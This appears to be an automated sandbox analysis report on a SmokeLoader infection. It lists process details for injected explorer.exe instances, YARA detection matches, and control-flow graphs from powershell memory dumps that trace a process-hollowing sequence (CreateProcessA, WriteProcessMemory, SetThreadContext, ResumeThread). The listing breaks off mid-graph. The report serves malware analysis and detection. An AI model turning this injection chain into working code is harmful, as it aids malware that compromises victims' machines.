                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                  Imagebase:0x920000
                                  File size:2'972'672 bytes
                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:22
                                  Start time:12:36:12
                                  Start date:27/05/2024
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                  Imagebase:0x920000
                                  File size:2'972'672 bytes
                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:23
                                  Start time:12:36:13
                                  Start date:27/05/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\explorer.exe
                                  Imagebase:0xff2f0000
                                  File size:3'229'696 bytes
                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:24
                                  Start time:12:36:14
                                  Start date:27/05/2024
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                  Imagebase:0x920000
                                  File size:2'972'672 bytes
                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000018.00000002.605262132.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  Has exited:false

                                  Target ID:25
                                  Start time:12:36:15
                                  Start date:27/05/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\explorer.exe
                                  Imagebase:0xff2f0000
                                  File size:3'229'696 bytes
                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_SmokeLoader, Description: Yara detected SmokeLoader, Source: 00000019.00000002.605299369.00000000000E1000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                  Has exited:false

                                  Target ID:28
                                  Start time:12:36:16
                                  Start date:27/05/2024
                                  Path:C:\Windows\SysWOW64\explorer.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                  Imagebase:0x920000
                                  File size:2'972'672 bytes
                                  MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:29
                                  Start time:12:36:17
                                  Start date:27/05/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\explorer.exe
                                  Imagebase:0xff2f0000
                                  File size:3'229'696 bytes
                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Reset < >
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.520766665.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1ad000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 13035319e03529589ee63bf52323257bafba1a8f54cefb85013494a0193c5cd1
                                    • Instruction ID: c9c393583e27a55d99fedf4ebf06d75a38ac75e5871eeca421fea811bf357251
                                    • Opcode Fuzzy Hash: 13035319e03529589ee63bf52323257bafba1a8f54cefb85013494a0193c5cd1
                                    • Instruction Fuzzy Hash: DB018C7140D7C09FE7134B259D94792BFA8EF53624F1984CBE8858F2A3C2685C49CB72
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.520766665.00000000001AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001AD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_1ad000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 72ed0ca5ac8eb259edd32094977a63011fd73309bc5f77a92202e6770a780821
                                    • Instruction ID: 0e5d8ef9f8e28f34912abf40070e9f8118e3fcf1e317b1d6ae31b5a5fc18aa92
                                    • Opcode Fuzzy Hash: 72ed0ca5ac8eb259edd32094977a63011fd73309bc5f77a92202e6770a780821
                                    • Instruction Fuzzy Hash: A5014770104B40EEF7244A21DD84767BBC8DF42760F18C415FC4A0F682C3798841CAB1

                                    Execution Graph

                                    Execution Coverage:9.5%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:33.3%
                                    Total number of Nodes:24
                                    Total number of Limit Nodes:2
                                    execution_graph 4970 456031 4972 455642 4970->4972 4971 456093 4972->4971 4975 456d18 WriteProcessMemory 4972->4975 4978 4570b0 4972->4978 4982 456ab9 4972->4982 4986 456ac0 4972->4986 4990 4569d0 4972->4990 4975->4972 4979 457137 CreateProcessA 4978->4979 4981 457395 4979->4981 4983 456b09 Wow64SetThreadContext 4982->4983 4985 456b87 4983->4985 4985->4972 4987 456b09 Wow64SetThreadContext 4986->4987 4989 456b87 4987->4989 4989->4972 4991 456a14 ResumeThread 4990->4991 4993 456a66 4991->4993 4993->4972 4994 455498 4996 4554cb 4994->4996 4995 456093 4996->4995 4997 456d18 WriteProcessMemory 4996->4997 4998 456ac0 Wow64SetThreadContext 4996->4998 4999 456ab9 Wow64SetThreadContext 4996->4999 5000 4570b0 CreateProcessA 4996->5000 5001 4569d0 ResumeThread 4996->5001 4997->4996 4998->4996 4999->4996 5000->4996 5001->4996

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 207 455498-4554c9 208 4554d0-455538 207->208 209 4554cb 207->209 211 455549-45563d call 452fbc call 454e6c call 451bb0 208->211 212 45553a-455548 208->212 209->208 227 456076-45608d 211->227 212->211 228 456093-45609a 227->228 229 455642-45573c call 4570b0 227->229 236 455764-4557ce 229->236 237 45573e-455759 229->237 243 4557d5-455801 236->243 244 4557d0 236->244 237->236 246 455807-45585c 243->246 247 45588b-4558e0 243->247 244->243 254 455884-455886 246->254 255 45585e-455879 246->255 252 4558e2-4558fd 247->252 253 455908 247->253 252->253 256 455909-455913 253->256 254->256 255->254 259 455915 256->259 260 45591a-455984 256->260 259->260 265 455986-4559a1 260->265 266 4559ac-4559c5 260->266 265->266 267 4559c7-455a15 266->267 268 455a3d-455af2 266->268 267->268 275 455a17-455a32 267->275 279 455af4-455b0f 268->279 280 455b1a-455b7b call 456d18 268->280 275->268 279->280 286 455ba3-455bde 280->286 287 455b7d-455b98 280->287 290 455d5e-455d7d 286->290 287->286 292 455be3-455c70 290->292 293 455d83-455dfe call 456d18 290->293 302 455c76-455d05 call 456d18 292->302 303 455d50-455d58 292->303 300 455e26-455e5c 293->300 301 455e00-455e1b 293->301 307 455e67-455e7d 300->307 308 455e5e-455e61 300->308 301->300 317 455d07-455d27 302->317 303->290 309 455e84-455eaf 307->309 310 455e7f 307->310 308->307 315 455eb5-455ee5 309->315 316 455f39-455f8e 309->316 310->309 343 455ee8 call 456ac0 315->343 344 455ee8 call 456ab9 315->344 325 455fb6 316->325 326 455f90-455fab 316->326 319 455d4f 317->319 320 455d29-455d44 317->320 319->303 320->319 324 455eea-455f0a 327 455f32-455f34 324->327 328 455f0c-455f27 324->328 329 455fb7-455fe3 call 4569d0 325->329 326->325 327->329 328->327 336 455fe5-456005 329->336 337 456007-456022 336->337 338 45602d-456071 336->338 337->338 338->227 338->228 343->324 344->324
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ($H(+
                                    • API String ID: 0-2544574499
                                    • Opcode ID: 9d088014436b7b8f756df1c9768e80f4ea5ad241f2332e480ca104e905454377
                                    • Instruction ID: 84b69e2266de36b1018aefef065b0cdfade0622397e153173968098c9e1234e1
                                    • Opcode Fuzzy Hash: 9d088014436b7b8f756df1c9768e80f4ea5ad241f2332e480ca104e905454377
                                    • Instruction Fuzzy Hash: 4262B174A00228CFDB65DF65C994BEEB7B2BF89305F1081EAD419A7291DB346E85CF40

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 598 4551e8-4554c9 606 4554d0-455538 598->606 607 4554cb 598->607 609 455549-4555af call 452fbc 606->609 610 45553a-455548 606->610 607->606 617 4555b4-4555cb call 454e6c 609->617 610->609 619 4555d0-45563d call 451bb0 617->619 625 456076-45608d 619->625 626 456093-45609a 625->626 627 455642-4556d9 625->627 632 4556e3-45571a call 4570b0 627->632 633 45571c-45573c 632->633 634 455764-4557ce 633->634 635 45573e-455759 633->635 641 4557d5-455801 634->641 642 4557d0 634->642 635->634 644 455807-45585c 641->644 645 45588b-4558e0 641->645 642->641 652 455884-455886 644->652 653 45585e-455879 644->653 650 4558e2-4558fd 645->650 651 455908 645->651 650->651 654 455909-455913 651->654 652->654 653->652 657 455915 654->657 658 45591a-455984 654->658 657->658 663 455986-4559a1 658->663 664 4559ac-4559c5 658->664 663->664 665 4559c7-455a15 664->665 666 455a3d-455af2 664->666 665->666 673 455a17-455a32 665->673 677 455af4-455b0f 666->677 678 455b1a-455b1f 666->678 673->666 677->678 681 455b29-455b59 call 456d18 678->681 683 455b5b-455b7b 681->683 684 455ba3-455bde 683->684 685 455b7d-455b98 683->685 688 455d5e-455d7d 684->688 685->684 690 455be3-455c70 688->690 691 455d83-455da5 688->691 700 455c76-455cc1 690->700 701 455d50-455d58 690->701 694 455daf-455ddc call 456d18 691->694 696 455dde-455dfe 694->696 698 455e26-455e5c 696->698 699 455e00-455e1b 696->699 705 455e67-455e7d 698->705 706 455e5e-455e61 698->706 699->698 711 455ccb-455d05 call 456d18 700->711 701->688 707 455e84-455eaf 705->707 708 455e7f 705->708 706->705 713 455eb5-455ebb 707->713 714 455f39-455f8e 707->714 708->707 715 455d07-455d27 711->715 719 455ec5-455ee5 713->719 723 455fb6 714->723 724 455f90-455fab 714->724 717 455d4f 715->717 718 455d29-455d44 715->718 717->701 718->717 741 455ee8 call 456ac0 719->741 742 455ee8 call 456ab9 719->742 722 455eea-455f0a 725 455f32-455f34 722->725 726 455f0c-455f27 722->726 727 455fb7-455fbc 723->727 724->723 725->727 726->725 731 455fc6-455fe3 call 4569d0 727->731 734 455fe5-456005 731->734 735 456007-456022 734->735 736 45602d-456071 734->736 735->736 736->625 736->626 741->722 742->722
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7aec9a3d895c77a967512786404b21d6a7285078f5ea164add46213cbf69a8f5
                                    • Instruction ID: 283bd6ca81ad1acfcb137b5666e0383f7118ae135bef07f5ba2ea87c4058b426
                                    • Opcode Fuzzy Hash: 7aec9a3d895c77a967512786404b21d6a7285078f5ea164add46213cbf69a8f5
                                    • Instruction Fuzzy Hash: 6C814D71D0A3988FDB16DF29D8606D9BFB1AF8A300F0580EBD488AB266D7344D85CF55

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 20c2bcc-20c2bcf 1 20c2bd5-20c2bdd 0->1 2 20c2bd1-20c2bd3 0->2 3 20c2bdf-20c2be5 1->3 4 20c2bf5-20c2bf9 1->4 2->1 14 20c2be9-20c2bf3 3->14 15 20c2be7 3->15 5 20c2bff-20c2c03 4->5 6 20c2d24-20c2d2e 4->6 8 20c2c05-20c2c16 5->8 9 20c2c43 5->9 10 20c2d3c-20c2d42 6->10 11 20c2d30-20c2d39 6->11 20 20c2d7c-20c2d84 8->20 21 20c2c1c-20c2c21 8->21 16 20c2c45-20c2c47 9->16 12 20c2d48-20c2d54 10->12 13 20c2d44-20c2d46 10->13 18 20c2d56-20c2d79 12->18 13->18 14->4 15->4 16->6 19 20c2c4d-20c2c51 16->19 19->6 24 20c2c57-20c2c5b 19->24 33 20c2dab-20c2dcb 20->33 34 20c2d86-20c2da9 20->34 25 20c2c39-20c2c41 21->25 26 20c2c23-20c2c29 21->26 24->6 28 20c2c61-20c2c87 24->28 25->16 29 20c2c2d-20c2c37 26->29 30 20c2c2b 26->30 28->6 44 20c2c8d-20c2c91 28->44 29->25 30->25 37 20c2fce-20c2fd4 33->37 38 20c2dd1-20c2dd6 33->38 34->33 39 20c2dee-20c2df2 38->39 40 20c2dd8-20c2dde 38->40 45 20c2df8-20c2dfa 39->45 46 20c2f77-20c2f81 39->46 42 20c2de0 40->42 43 20c2de2-20c2dec 40->43 42->39 43->39 48 20c2cb4 44->48 49 20c2c93-20c2c9c 44->49 50 20c2dfc-20c2e08 45->50 51 20c2e0a 45->51 52 20c2f8d-20c2f93 46->52 53 20c2f83-20c2f8a 46->53 58 20c2cb7-20c2cc4 48->58 55 20c2c9e-20c2ca1 49->55 56 20c2ca3-20c2cb0 49->56 57 20c2e0c-20c2e0e 50->57 51->57 59 20c2f99-20c2fa5 52->59 60 20c2f95-20c2f97 52->60 61 20c2cb2 55->61 56->61 57->46 62 20c2e14-20c2e33 57->62 65 20c2cca-20c2d21 58->65 63 20c2fa7-20c2fcb 59->63 60->63 61->58 72 20c2e35-20c2e41 62->72 73 20c2e43 62->73 74 20c2e45-20c2e47 72->74 73->74 74->46 75 20c2e4d-20c2e51 74->75 75->46 76 20c2e57-20c2e5b 75->76 77 20c2e5d-20c2e6c 76->77 78 20c2e6e 76->78 79 20c2e70-20c2e72 77->79 78->79 79->46 80 20c2e78-20c2e7c 79->80 80->46 81 20c2e82-20c2ea1 80->81 84 20c2eb9-20c2ec4 81->84 85 20c2ea3-20c2ea9 81->85 86 20c2ec6-20c2ec9 84->86 87 20c2ed3-20c2eef 84->87 88 20c2ead-20c2eaf 85->88 89 20c2eab 85->89 86->87 90 20c2f0c-20c2f16 87->90 91 20c2ef1-20c2f04 87->91 88->84 89->84 92 20c2f18 90->92 93 20c2f1a-20c2f68 90->93 91->90 94 20c2f6d-20c2f74 92->94 93->94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $&;$$&;$L4#p$L4#p$L4#p$X.;$X.;
                                    • API String ID: 0-3231618936
                                    • Opcode ID: c23251a8849a92b3ed113f318b03464ec1d90642dbb01534e9a1102c3b49b594
                                    • Instruction ID: d26292537889a532a4d24798ff3cc44377f65ff36d393db3acfbe3cb653347a7
                                    • Opcode Fuzzy Hash: c23251a8849a92b3ed113f318b03464ec1d90642dbb01534e9a1102c3b49b594
                                    • Instruction Fuzzy Hash: 19B155B5B00348EFDB26CF64C8507AE77E2AF84314F24846EED158B691CB75C941EB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 101 4570b0-457149 103 457192-4571ba 101->103 104 45714b-457162 101->104 108 457200-457256 103->108 109 4571bc-4571d0 103->109 104->103 107 457164-457169 104->107 110 45718c-45718f 107->110 111 45716b-457175 107->111 118 45729c-457393 CreateProcessA 108->118 119 457258-45726c 108->119 109->108 116 4571d2-4571d7 109->116 110->103 112 457177 111->112 113 457179-457188 111->113 112->113 113->113 117 45718a 113->117 120 4571d9-4571e3 116->120 121 4571fa-4571fd 116->121 117->110 137 457395-45739b 118->137 138 45739c-457481 118->138 119->118 127 45726e-457273 119->127 122 4571e5 120->122 123 4571e7-4571f6 120->123 121->108 122->123 123->123 126 4571f8 123->126 126->121 129 457275-45727f 127->129 130 457296-457299 127->130 131 457281 129->131 132 457283-457292 129->132 130->118 131->132 132->132 133 457294 132->133 133->130 137->138 150 457491-457495 138->150 151 457483-457487 138->151 153 4574a5-4574a9 150->153 154 457497-45749b 150->154 151->150 152 457489 151->152 152->150 156 4574b9-4574bd 153->156 157 4574ab-4574af 153->157 154->153 155 45749d 154->155 155->153 158 4574f3-4574fe 156->158 159 4574bf-4574e8 156->159 157->156 160 4574b1 157->160 164 4574ff 158->164 159->158 160->156 164->164
                                    APIs
                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00457377
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID: H;O0$H;O0
                                    • API String ID: 963392458-4265240742
                                    • Opcode ID: d10fb06abc5dcd71d644c48ba781a54700a1bf690732b91c453619b85fcfc55d
                                    • Instruction ID: ffc26b0e59917deaf5bab04bb8a3e58e49c4ec6c8f9e93b59d0fe51f5e815f9d
                                    • Opcode Fuzzy Hash: d10fb06abc5dcd71d644c48ba781a54700a1bf690732b91c453619b85fcfc55d
                                    • Instruction Fuzzy Hash: CCC13870D00219CFDF24CFA4D845BEEBBB1BB45304F0495AAE819B7241DB789A89CF95

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 165 456d18-456d83 167 456d85-456d97 165->167 168 456d9a-456e01 WriteProcessMemory 165->168 167->168 170 456e03-456e09 168->170 171 456e0a-456e5c 168->171 170->171
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00456DEB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: H;O0
                                    • API String ID: 3559483778-115525337
                                    • Opcode ID: d375ddde9474c5fc8dfa0f096ca965ac789e59729754db8054debceacadf5928
                                    • Instruction ID: bdf4fccc363b8cc79ffd9880a97a97131304c88b7fdfcfddb3c792ed35c51cdb
                                    • Opcode Fuzzy Hash: d375ddde9474c5fc8dfa0f096ca965ac789e59729754db8054debceacadf5928
                                    • Instruction Fuzzy Hash: CE41ABB5D012489FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D779AA45CF64

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 176 456ab9-456b20 178 456b37-456b85 Wow64SetThreadContext 176->178 179 456b22-456b34 176->179 181 456b87-456b8d 178->181 182 456b8e-456bda 178->182 179->178 181->182
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00456B6F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: H;O0
                                    • API String ID: 983334009-115525337
                                    • Opcode ID: f94d7682af85ea9666e55f5977881603a92d6ad595b4799127a23068bcdecbdf
                                    • Instruction ID: 6b5b464746650577518d9c4d1fa9e5a9a480d32e66464ee79d483c4c07aa51be
                                    • Opcode Fuzzy Hash: f94d7682af85ea9666e55f5977881603a92d6ad595b4799127a23068bcdecbdf
                                    • Instruction Fuzzy Hash: 1141DDB4D002599FDB10CFA9D984AEEFBB0BF49314F24842AE814B7241D7786A49CF54

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 187 456ac0-456b20 189 456b37-456b85 Wow64SetThreadContext 187->189 190 456b22-456b34 187->190 192 456b87-456b8d 189->192 193 456b8e-456bda 189->193 190->189 192->193
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 00456B6F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: H;O0
                                    • API String ID: 983334009-115525337
                                    • Opcode ID: ad327f07c1fb256b419ba498022f9b91d33528451cdadda129835ca7f64531ba
                                    • Instruction ID: 1d42ae3ae73136bcdf0c9d93dab18919d68bb78b7b276850d2681f4390148fa4
                                    • Opcode Fuzzy Hash: ad327f07c1fb256b419ba498022f9b91d33528451cdadda129835ca7f64531ba
                                    • Instruction Fuzzy Hash: E641CEB4D00258DFDB10CFA9D984AEEFBB1BF49314F24802AE814B7240D779AA49CF54

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 198 4569d0-456a64 ResumeThread 201 456a66-456a6c 198->201 202 456a6d-456aaf 198->202 201->202
                                    APIs
                                    • ResumeThread.KERNELBASE(?), ref: 00456A4E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453579154.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_450000_powershell.jbxd
                                    Similarity
                                    • API ID: ResumeThread
                                    • String ID: H;O0
                                    • API String ID: 947044025-115525337
                                    • Opcode ID: 2c6c8357f780c092936bf0021cb3f1686caee02d17c57137f34762752962a6d4
                                    • Instruction ID: 16f080745e9da6583dd7418b3a5f2c7f0da4afc5b85b7a0d2a4ba798ac68cfbe
                                    • Opcode Fuzzy Hash: 2c6c8357f780c092936bf0021cb3f1686caee02d17c57137f34762752962a6d4
                                    • Instruction Fuzzy Hash: EF31DBB4D00218DFCF10CFA9D884ADEFBB0AB89314F20942AE814B7300C735A905CF98

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 349 20c16d0-20c16df 350 20c16ff 349->350 351 20c16e1-20c16fd 349->351 352 20c1701-20c1703 350->352 351->352 354 20c1709-20c1710 352->354 355 20c17b0-20c17ba 352->355 356 20c1808-20c1810 354->356 357 20c1716-20c171b 354->357 358 20c17bc-20c17c3 355->358 359 20c17c6-20c17cc 355->359 371 20c1837-20c185b 356->371 372 20c1812-20c1836 356->372 361 20c171d-20c1723 357->361 362 20c1733-20c1749 357->362 363 20c17ce-20c17d0 359->363 364 20c17d2-20c17de 359->364 367 20c1725 361->367 368 20c1727-20c1731 361->368 362->356 376 20c174f-20c176f 362->376 365 20c17e0-20c17fb 363->365 364->365 367->362 368->362 373 20c1ac6-20c1acc 371->373 374 20c1861-20c1866 371->374 372->371 387 20c1ace-20c1af1 373->387 388 20c1af3-20c1b0e 373->388 378 20c187e-20c1882 374->378 379 20c1868-20c186e 374->379 391 20c17fe-20c1803 376->391 392 20c1775-20c177f 376->392 384 20c1888-20c188c 378->384 385 20c1a73-20c1a7d 378->385 381 20c1870 379->381 382 20c1872-20c187c 379->382 381->378 382->378 393 20c188e-20c189d 384->393 394 20c189f 384->394 389 20c1a7f-20c1a88 385->389 390 20c1a8b-20c1a91 385->390 387->388 396 20c1c7b-20c1cad 388->396 397 20c1b14-20c1b19 388->397 398 20c1a97-20c1aa3 390->398 399 20c1a93-20c1a95 390->399 391->392 392->364 400 20c1782-20c17aa 392->400 401 20c18a1-20c18a3 393->401 394->401 416 20c1cbd 396->416 417 20c1caf-20c1cbb 396->417 402 20c1b1b-20c1b21 397->402 403 20c1b31-20c1b35 397->403 404 20c1aa5-20c1ac3 398->404 399->404 400->355 401->385 406 20c18a9-20c18ab 401->406 408 20c1b25-20c1b2f 402->408 409 20c1b23 402->409 412 20c1c2a-20c1c34 403->412 413 20c1b3b-20c1b3d 403->413 414 20c18ad-20c18c8 406->414 415 20c18ca 406->415 408->403 409->403 419 20c1c36-20c1c3f 412->419 420 20c1c42-20c1c48 412->420 421 20c1b4d 413->421 422 20c1b3f-20c1b4b 413->422 418 20c18cc-20c18ce 414->418 415->418 424 20c1cbf-20c1cc1 416->424 417->424 418->385 425 20c18d4-20c1900 418->425 426 20c1c4e-20c1c5a 420->426 427 20c1c4a-20c1c4c 420->427 429 20c1b4f-20c1b51 421->429 422->429 431 20c1d0d-20c1d17 424->431 432 20c1cc3-20c1cc9 424->432 425->385 467 20c1906-20c1913 425->467 433 20c1c5c-20c1c78 426->433 427->433 429->412 434 20c1b57-20c1b59 429->434 441 20c1d19-20c1d1f 431->441 442 20c1d22-20c1d28 431->442 437 20c1ccb-20c1ccd 432->437 438 20c1cd7-20c1cf4 432->438 443 20c1b69 434->443 444 20c1b5b-20c1b67 434->444 437->438 456 20c1d5a-20c1d5f 438->456 457 20c1cf6-20c1d07 438->457 447 20c1d2e-20c1d3a 442->447 448 20c1d2a-20c1d2c 442->448 445 20c1b6b-20c1b6d 443->445 444->445 445->412 450 20c1b73-20c1b75 445->450 449 20c1d3c-20c1d57 447->449 448->449 453 20c1b8f-20c1b93 450->453 454 20c1b77-20c1b7d 450->454 461 20c1bad-20c1c27 453->461 462 20c1b95-20c1b9b 453->462 459 20c1b7f 454->459 460 20c1b81-20c1b8d 454->460 456->457 457->431 459->453 460->453 465 20c1b9d 462->465 466 20c1b9f-20c1bab 462->466 465->461 466->461 472 20c19ac-20c19eb 467->472 473 20c1919-20c191e 467->473 495 20c19f2-20c1a01 472->495 475 20c1936-20c194f 473->475 476 20c1920-20c1926 473->476 475->472 484 20c1951-20c1973 475->484 479 20c1928 476->479 480 20c192a-20c1934 476->480 479->475 480->475 488 20c198d-20c1997 484->488 489 20c1975-20c197b 484->489 493 20c199c-20c19aa 488->493 490 20c197d 489->490 491 20c197f-20c198b 489->491 490->488 491->488 493->495 498 20c1a19-20c1a70 495->498 499 20c1a03-20c1a09 495->499 501 20c1a0d-20c1a0f 499->501 502 20c1a0b 499->502 501->498 502->498
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.453669389.00000000020C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 020C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_20c0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: [i$[i
                                    • API String ID: 0-731996973
                                    • Opcode ID: 55c973e9bd2f79bb1fcfdbe1b1474ddbe25dcc7b0f28642bfcea9f6b474885a6
                                    • Instruction ID: 53e2340945680e4e7c31b7440dcce7ca15d42a4d07898bd3180d6ee301121247
                                    • Opcode Fuzzy Hash: 55c973e9bd2f79bb1fcfdbe1b1474ddbe25dcc7b0f28642bfcea9f6b474885a6
                                    • Instruction Fuzzy Hash: 76022471B04300DFEB269B68845076EFBE2AFC5210F3484AEE44D9B392DB71C946D7A1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 503 20c2be6-20c2bf9 506 20c2bff-20c2c03 503->506 507 20c2d24-20c2d2e 503->507 508 20c2c05-20c2c16 506->508 509 20c2c43 506->509 510 20c2d3c-20c2d42 507->510 511 20c2d30-20c2d39 507->511 518 20c2d7c-20c2d84 508->518 519 20c2c1c-20c2c21 508->519 514 20c2c45-20c2c47 509->514 512 20c2d48-20c2d54 510->512 513 20c2d44-20c2d46 510->513 516 20c2d56-20c2d79 512->516 513->516 514->507 517 20c2c4d-20c2c51 514->517 517->507 521 20c2c57-20c2c5b 517->521 530 20c2dab-20c2dcb 518->530 531 20c2d86-20c2da9 518->531 522 20c2c39-20c2c41 519->522 523 20c2c23-20c2c29 519->523 521->507 525 20c2c61-20c2c87 521->525 522->514 526 20c2c2d-20c2c37 523->526 527 20c2c2b 523->527 525->507 541 20c2c8d-20c2c91 525->541 526->522 527->522 534 20c2fce-20c2fd4 530->534 535 20c2dd1-20c2dd6 530->535 531->530 536 20c2dee-20c2df2 535->536 537 20c2dd8-20c2dde 535->537 542 20c2df8-20c2dfa 536->542 543 20c2f77-20c2f81 536->543 539 20c2de0 537->539 540 20c2de2-20c2dec 537->540 539->536 540->536 545 20c2cb4 541->545 546 20c2c93-20c2c9c 541->546 547 20c2dfc-20c2e08 542->547 548 20c2e0a 542->548 549 20c2f8d-20c2f93 543->549 550 20c2f83-20c2f8a 543->550 555 20c2cb7-20c2cc4 545->555 552 20c2c9e-20c2ca1 546->552 553 20c2ca3-20c2cb0 546->553 554 20c2e0c-20c2e0e 547->554 548->554 556 20c2f99-20c2fa5 549->556 557 20c2f95-20c2f97 549->557 558 20c2cb2 552->558 553->558 554->543 559 20c2e14-20c2e33 554->559 562 20c2cca-20c2d21 555->562 560 20c2fa7-20c2fcb 556->560 557->560 558->555 569 20c2e35-20c2e41 559->569 570 20c2e43 559->570 571 20c2e45-20c2e47 569->571 570->571 571->543 572 20c2e4d-20c2e51 571->572 572->543 573 20c2e57-20c2e5b 572->573 574 20c2e5d-20c2e6c 573->574 575 20c2e6e 573->575 576 